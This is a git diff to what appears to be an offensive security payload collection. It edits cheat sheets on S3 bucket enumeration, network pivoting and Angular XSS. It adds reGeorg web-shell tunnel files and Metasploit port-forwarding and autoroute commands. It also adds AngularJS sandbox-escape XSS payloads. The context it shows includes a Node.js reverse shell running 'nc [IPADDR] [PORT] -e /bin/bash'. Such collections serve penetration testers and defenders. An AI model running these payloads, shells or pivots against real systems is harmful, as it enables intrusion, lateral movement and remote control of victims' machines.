diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 13d257a..53e27d1 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -36,6 +36,14 @@ Their names are also listed if the listing is enabled. adobe-REDACTED-REDACTED-REDACTED ``` +Alternatively you can extract the name of inside-site s3 bucket with `%C0`. (Trick from https://twitter.com/0xmdv/status/1065581916437585920) + +```xml +http://example.com/resources/id%C0 + +eg: http://redacted/avatar/123%C0 +``` + ## Basic test - Listing the files ```bash diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index d49e426..be5a125 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -59,8 +59,38 @@ Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6` [reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. +Drop one of the following files on the server: + +- tunnel.ashx +- tunnel.aspx +- tunnel.js +- tunnel.jsp +- tunnel.nosocket.php +- tunnel.php +- tunnel.tomcat.5.jsp + ```python -python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp +python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080 + +optional arguments: + -h, --help show this help message and exit + -l , --listen-on The default listening address + -p , --listen-port The default listening port + -r , --read-buff Local read buffer, max data to be sent per POST + -u , --url The url containing the tunnel script + -v , --verbose Verbose output[INFO|DEBUG] +``` + +## Metasploit + +```c +portfwd list +portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 + +or + +run autoroute -s 192.168.57.0/24 +use auxiliary/server/socks4a ``` ## Rpivot @@ -140,4 +170,5 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/) * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) -* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) \ No newline at end of file +* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) +* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) \ No newline at end of file diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 44248b8..cd8423f 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -153,6 +153,10 @@ or -var x = global.process.mainModule.require -x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') + +or + +https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py ``` ### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) diff --git a/XSS injection/XSS in Angular.md b/XSS injection/XSS in Angular.md index adfb754..85c1076 100644 --- a/XSS injection/XSS in Angular.md +++ b/XSS injection/XSS in Angular.md @@ -1,5 +1,13 @@ # XSS in Angular +> Angular as of version 1.6 have removed the sandbox altogether + +Angular 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin) + +```javascript +{{constructor.constructor('alert(1)')()}} +``` + Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265) ```javascript @@ -8,7 +16,7 @@ Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/103153474608 Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D) -Angular 1.6.0 [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830) +Angular 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830) ```javascript {{0[a='constructor'][a]('alert(1)')()}} @@ -16,7 +24,7 @@ Angular 1.6.0 [@LewisArdern](https://twitter.com/LewisArdern/status/105588761961 {{$on.constructor('alert(1)')()}} ``` -Angular 1.5.9 +Angular 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh) ```javascript {{ @@ -139,4 +147,8 @@ Vue JS ```javascript {{constructor.constructor('alert(1)')()}} -``` \ No newline at end of file +``` + +## Thanks + +- [](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs) \ No newline at end of file